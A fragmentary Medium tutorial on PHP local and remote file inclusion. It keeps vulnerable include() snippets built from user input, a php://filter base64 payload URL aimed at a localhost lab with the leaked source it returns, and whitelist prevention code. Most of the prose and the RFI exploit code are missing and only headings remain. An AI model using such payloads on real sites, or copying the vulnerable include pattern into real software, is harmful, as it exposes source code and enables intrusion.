Remote File Inclusion & Local File Inclusion (RFI & LFI)

...
$page = $_GET["page"]; // or using post $_POST["page"] the point is there is data passed to a server.
include($page.".php"); // This is vulnerable to RFI and LFI$base_url = "https://example.com/";
include($base_url.$page.".php"); //This is vulnerable to LFI only
...

Local File Inclusion (LFI)

Straight Forward LFI

A Very Useful Website
A Very Useful Website (2)
Normal.txt Content
LFI Exploitation
Example of Path Traversal

Null Byte Injection

#pretty secure $page = $_GET["page"];
include($page.".php"); #it basically prevents any inclusion aside than file with PHP format

PHP Filters Base64 Conversion

Very Useful Website
Source Code
http://localhost/lab/rfi/vuln.php?page=php://filter/convert.base64-encode/resource=vuln.php
The Display of Inclusion Base64 Filter
PGh0bWw+DQoJPGJvZHk+DQoJCTxhIGhyZWYgPSAiP3BhZ2U9bm9ybWFsLnR4dCI+Q2xpY2sgbWUgdG8gc2hvdyBjb250ZW50ITwvYT4NCgkJPD9waHANCg0KCQlpZihpc3NldCgkX0dFVFsicGFnZSJdKSl7DQoJCQkkcGFnZSA9ICRfR0VUWyJwYWdlIl07DQoJCQlpbmNsdWRlKCRwYWdlKTsNCgkJfQ0KDQoJCT8+DQoJPC9ib2R5Pg0KPC9odG1sPg0K
Base64 Decoding of the Source Code

Attack Combination

Remote File Inclusion (RFI)

Preparation

File Manager Display

Strategy

RFI Schema
This is the Code on The Attacker’s Server (rfi-exploit.php)
RFI Attack
Proof of Concept Where the RFI Code is Executed
The Exploit Code
Our RFI Exploit
RFI Exploitation
Sad Story of RFI

Prevention

$lang = $_GET["lang"];if($lang === "en"){
include("en_lang.php");
else if($lang == "id"){
include("id_lang.php");
else{
include("en_lang.php");
}
include("en_lang.php"); 
include("path/to/the/included/file/en_lang.php");

Closing

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store